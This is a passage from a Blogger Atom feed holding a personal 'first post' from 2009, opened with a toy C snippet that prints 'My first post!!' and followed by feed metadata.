ms';"&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; width: auto; font: normal normal normal 100%/normal Georgia, serif; text-align: left; "&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;  clrscr();&lt;/span&gt;&lt;/div&gt;&lt;div style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; width: auto; font: normal normal normal 100%/normal Georgia, serif; text-align: left; "&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;  printf("My first post!!");&lt;/span&gt;&lt;/div&gt;&lt;div style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; width: auto; font: normal normal normal 100%/normal Georgia, serif; text-align: left; "&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;  getch();&lt;/span&gt;&lt;/div&gt;&lt;div style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; width: auto; font: normal normal normal 100%/normal Georgia, serif; text-align: left; "&gt;&lt;span 
class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;  return 0;&lt;/span&gt;&lt;/div&gt;&lt;div style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; width: auto; font: normal normal normal 100%/normal Georgia, serif; text-align: left; "&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; width: auto; font: normal normal normal 100%/normal Georgia, serif; text-align: left; "&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; width: auto; font: normal normal normal 100%/normal Georgia, serif; text-align: left; "&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;Well I finally jumped the bandwagon... Was wondering how long I would be able to escape the blob.. oh.. ah.. typo there.. the blog effect. Its 2:42 AM here in Bangalore, the 17th of June 2009 (oh is it already huh??), nice time to begin blogging.. Its weird though that when I powered on my laptop an hour ago, I had never thought I would be writing.. 
Such is Life..&lt;/span&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;I stare at my laptop screen with shrivelled eyes, my pupils constricting under the strain of my day's work.. I go on.. Come on! Its my first post I say.. Need to write something meaningful so that my kids (when I have them and when they are able to blog) can proudly show their friends what their super-dad had written this fateful night..&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;I thought there were other things in life people cared about..&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style=" ;font-family:'trebuchet ms';"&gt;Feeling too sleepy, should retire before my fingers start typing gibberish.. I cant bear that on my blog.. 
atleast not on my first post..&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;Good night..&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-5252525602460981822?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/5252525602460981822/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2009/06/my-first-post.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/5252525602460981822'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/5252525602460981822'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2009/06/my-first-post.html' title='My first post!!'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><thr:total>3</thr:total></entry></feed>
